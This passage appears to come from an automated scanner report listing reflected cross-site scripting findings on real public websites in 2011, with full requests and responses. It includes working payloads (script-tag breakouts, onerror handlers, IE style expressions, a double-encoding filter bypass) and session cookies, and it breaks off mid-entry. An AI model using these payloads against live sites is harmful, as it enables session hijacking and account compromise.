This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platformd1666"><script>alert(1)</script>0c0acabc5be/ps3-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:22 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=qg2f822huup33e8vdjs9ee1p80; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31139
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platformd1666"><script>alert(1)</script>0c0acabc5be/ps3-games" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7ff7"><script>alert(1)</script>3d766d616d5 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/ps3-gamesb7ff7"><script>alert(1)</script>3d766d616d5 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:26 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=eclo7i73cfqlnl7uaeqlknq0g6; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31139
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform/ps3-gamesb7ff7"><script>alert(1)</script>3d766d616d5" /> ...[SNIP]...
3.578. http://www.ea.com/platform/ps3-games [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ea.com
Path: /platform/ps3-games
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 82e73"><script>alert(1)</script>17436741d31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/ps3-games?82e73"><script>alert(1)</script>17436741d31=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:49 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=luocner863ance16967gh02qs0; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 85039
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/ps3-games?82e73"><script>alert(1)</script>17436741d31=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9838c"><script>alert(1)</script>d99c4148412 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform9838c"><script>alert(1)</script>d99c4148412/xbox-360-games HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:13 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=ghogbj07oe5vmhojil9itqhbl0; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31144
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform9838c"><script>alert(1)</script>d99c4148412/xbox-360-games" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9216f"><script>alert(1)</script>e3244aad044 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/xbox-360-games9216f"><script>alert(1)</script>e3244aad044 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:17 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=3g5dcbo2tg5kp6hne4mvnq76f3; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31144
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/platform/xbox-360-games9216f"><script>alert(1)</script>e3244aad044" /> ...[SNIP]...
3.581. http://www.ea.com/platform/xbox-360-games [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ea.com
Path: /platform/xbox-360-games
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7223"><script>alert(1)</script>38f7d5e6e2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /platform/xbox-360-games?c7223"><script>alert(1)</script>38f7d5e6e2c=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:42 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=9cg06j3gera3opfjeuupp54g93; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 84502
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/platform/xbox-360-games?c7223"><script>alert(1)</script>38f7d5e6e2c=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73bb4"><script>alert(1)</script>d65c535f196 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wii73bb4"><script>alert(1)</script>d65c535f196 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 03:08:31 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=g1f11esrsvgvlcmd3l6f10r4o0; path=/ Status: 404 Not Found Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 31123
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <link rel="canonical" href="http://www.ea.com/wii73bb4"><script>alert(1)</script>d65c535f196" /> ...[SNIP]...
3.583. http://www.ea.com/wii [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.ea.com
Path: /wii
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 42ab4"><script>alert(1)</script>a2f77cd35b6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /wii?42ab4"><script>alert(1)</script>a2f77cd35b6=1 HTTP/1.1 Host: www.ea.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:07:52 GMT Server: Apache/2.2.8 (Ubuntu) mod_jk/1.2.25 PHP/5.2.12 X-Powered-By: PHP/5.2.12 Set-Cookie: symfony=jinvebj2q69pplgb192rrvfur0; path=/ Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 71389
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" xmln ...[SNIP]... <a class="shareIcon digg" href="http://www.digg.com/submit?url=http://www.ea.com/wii?42ab4"><script>alert(1)</script>a2f77cd35b6=1"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a24d"><img%20src%3da%20onerror%3dalert(1)>29cb609e200 was submitted in the REST URL parameter 2. This input was echoed as 5a24d"><img src=a onerror=alert(1)>29cb609e200 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /news/3881925a24d"><img%20src%3da%20onerror%3dalert(1)>29cb609e200/peanut-labs-inc-announces-acquisition-e-rewards-inc- HTTP/1.1 Host: www.freshnews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
3.585. http://www.intellicast.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.intellicast.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf718"style%3d"x%3aexpression(alert(1))"9a54e9bc174 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as cf718"style="x:expression(alert(1))"9a54e9bc174 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /?cf718"style%3d"x%3aexpression(alert(1))"9a54e9bc174=1 HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36278%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220a3c2ea7beb was submitted in the REST URL parameter 2. This input was echoed as 36278"style="x:expression(alert(1))"0a3c2ea7beb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /Local/Weather.aspx36278%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25220a3c2ea7beb HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of the location request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f90ff"style%3d"x%3aexpression(alert(1))"f8791e1c3b8 was submitted in the location parameter. This input was echoed as f90ff"style="x:expression(alert(1))"f8791e1c3b8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Local/Weather.aspx?location=USMI0020f90ff"style%3d"x%3aexpression(alert(1))"f8791e1c3b8 HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00_Head1"><title> In ...[SNIP]... <a href="/Local/Weather.aspx?unit=C&location=USMI0020f90ff"style="x:expression(alert(1))"f8791e1c3b8"> ...[SNIP]...
3.588. http://www.intellicast.com/Local/Weather.aspx [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.intellicast.com
Path: /Local/Weather.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54ef9"style%3d"x%3aexpression(alert(1))"23d5246f6f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54ef9"style="x:expression(alert(1))"23d5246f6f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /Local/Weather.aspx?location=USMI0020&54ef9"style%3d"x%3aexpression(alert(1))"23d5246f6f3=1 HTTP/1.1 Host: www.intellicast.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head id="ctl00_ctl00_Head1"><title> In ...[SNIP]... <a href="/Local/Weather.aspx?unit=C&location=USMI0020&54ef9"style="x:expression(alert(1))"23d5246f6f3=1"> ...[SNIP]...
3.589. http://www.mlive.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.mlive.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db83d'-alert(1)-'e027fe9bbf5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?db83d'-alert(1)-'e027fe9bbf5=1 HTTP/1.1 Host: www.mlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: CP='CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi SAMo OTRo BUS IND PHY ONL UNI COM NAV INT DEM' Content-Type: text/html; charset=ISO-8859-1 Cache-Control: max-age=1 Expires: Sun, 09 Jan 2011 01:44:46 GMT Date: Sun, 09 Jan 2011 01:44:45 GMT Connection: close Connection: Transfer-Encoding Content-Length: 107437
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><script type="text/javascri ...[SNIP]... f';
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e199a"><script>alert(1)</script>d7f28494553 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /e199a"><script>alert(1)</script>d7f28494553/index.php HTTP/1.1 Host: www.outofhanwell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 05:23:20 GMT Server: Apache Content-Length: 2340 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... <frame src="http://www.sedoparking.com/domparking.php?id=415788&u=http://www.outofhanwell.com/e199a"><script>alert(1)</script>d7f28494553/index.php"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30833"><script>alert(1)</script>87e69a6bfec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/30833"><script>alert(1)</script>87e69a6bfec HTTP/1.1 Host: www.outofhanwell.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 Not Found Date: Sun, 09 Jan 2011 05:23:22 GMT Server: Apache Content-Length: 2335 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Frameset//EN" "http://www.w3.org/TR/html4/frameset.dtd"> <html> <head> <title>Error 404 - Not found</title> </head> <frameset rows="100%" framebo ...[SNIP]... <frame src="http://www.sedoparking.com/domparking.php?id=415788&u=http://www.outofhanwell.com/blog/30833"><script>alert(1)</script>87e69a6bfec"> ...[SNIP]...
3.592. http://www.pandora.com/people/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.pandora.com
Path: /people/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf8db"><script>alert(1)</script>09862348e83 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /people/?cf8db"><script>alert(1)</script>09862348e83=1 HTTP/1.1 Host: www.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 01:20:34 GMT Content-Type: text/html; charset=UTF-8 Connection: close Content-Length: 13162
<html>
<head>
<title>Pandora Radio - Listen to Free Internet Radio, Find New Music</title>
The value of the coreClass request parameter is copied into the XML document as plain text between tags. The payload 21731<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>813616225af was submitted in the coreClass parameter. This input was echoed as 21731<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>813616225af in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
<?xml version="1.0"?><errorInfo><error><![CDATA[Class ParentCompanyInitCmd21731<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>813616225af does not exist]]></error><reset><![C ...[SNIP]...
The value of the coreClass request parameter is copied into the HTML document as plain text between tags. The payload c0786<img%20src%3da%20onerror%3dalert(1)>92aed5e9cf6 was submitted in the coreClass parameter. This input was echoed as c0786<img src=a onerror=alert(1)>92aed5e9cf6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the iframe_tag request parameter is copied into the HTML document as plain text between tags. The payload 6d2fe<script>alert(1)</script>8329d0dc6 was submitted in the iframe_tag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the rewardAvailable request parameter is copied into the HTML document as plain text between tags. The payload c00a4<img%20src%3da%20onerror%3dalert(1)>d0ead2e6fff was submitted in the rewardAvailable parameter. This input was echoed as c00a4<img src=a onerror=alert(1)>d0ead2e6fff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
3.597. http://www.peanutlabs.com/js/iFrame/sc.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.peanutlabs.com
Path: /js/iFrame/sc.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 97586'%3balert(1)//07d2d3ed2aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 97586';alert(1)//07d2d3ed2aa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/iFrame/sc.php?userId=998826224-3432-8939b9/97586'%3balert(1)//07d2d3ed2aa81e2 HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:33:30 GMT Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 571
The value of the userId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff40d'%3balert(1)//866b553c32d was submitted in the userId parameter. This input was echoed as ff40d';alert(1)//866b553c32d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /js/iFrame/sc.php?userId=998826224-3432-8939b981e2ff40d'%3balert(1)//866b553c32d HTTP/1.1 Host: www.peanutlabs.com Proxy-Connection: keep-alive Referer: http://www.peanutlabs.com/userGreeting.php?userId=998826224-3432-8939b981e2&var_val_1=10010&var_key_1=zipcode Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; pl_user_id=8939b981e2-5329197bbf0fb46f475fdce27e545262; pl_lang=en_US; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; __utmc=184043431; __utmb=184043431.1.10.1294536629
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 02:32:51 GMT Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html Content-Length: 570
3.599. http://www.peanutlabs.com/sampleIframe.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.peanutlabs.com
Path: /sampleIframe.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5765"><script>alert(1)</script>55e45c8f29a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sampleIframe.php?userId=testaccount@peanutlabs.com2962-69-abdd5b/f5765"><script>alert(1)</script>55e45c8f29a1634 HTTP/1.1 Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:23 GMT Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 568 Connection: close Content-Type: text/html
The value of the userId request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f75d4"><script>alert(1)</script>8d6cc451af9 was submitted in the userId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sampleIframe.php?userId=f75d4"><script>alert(1)</script>8d6cc451af9 HTTP/1.1 Host: www.peanutlabs.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: sex=deleted; pl_email=test4%40fastdial.net; __utmz=184043431.1294536629.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); SESSef469ce213eb8a405bbf25673950acca=0obr3bvubl5fq0qq2jj04d7pp6; pl_lang=en_US; pl_user_id=d41d8cd98f-285ee847b9a2bf89ede3fbb81de1ea0f; ext_cid=deleted; dob=deleted; PHPSESSID=3jamnj3v5les4euhv3rnmsdb04; __utma=184043431.2085445617.1294536629.1294536629.1294536629.1; pl_profile=deleted; __utmc=184043431; __utmb=184043431.2.10.1294536629;
Response
HTTP/1.1 200 OK Date: Sun, 09 Jan 2011 03:08:18 GMT Server: Apache Vary: Accept-Encoding,User-Agent Content-Length: 523 Connection: close Content-Type: text/html
The value of the f9258%22%3E%3Cscript%3Ealert(document.cookie request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7809"><script>alert(1)</script>9c836ad6bee was submitted in the f9258%22%3E%3Cscript%3Ealert(document.cookie parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
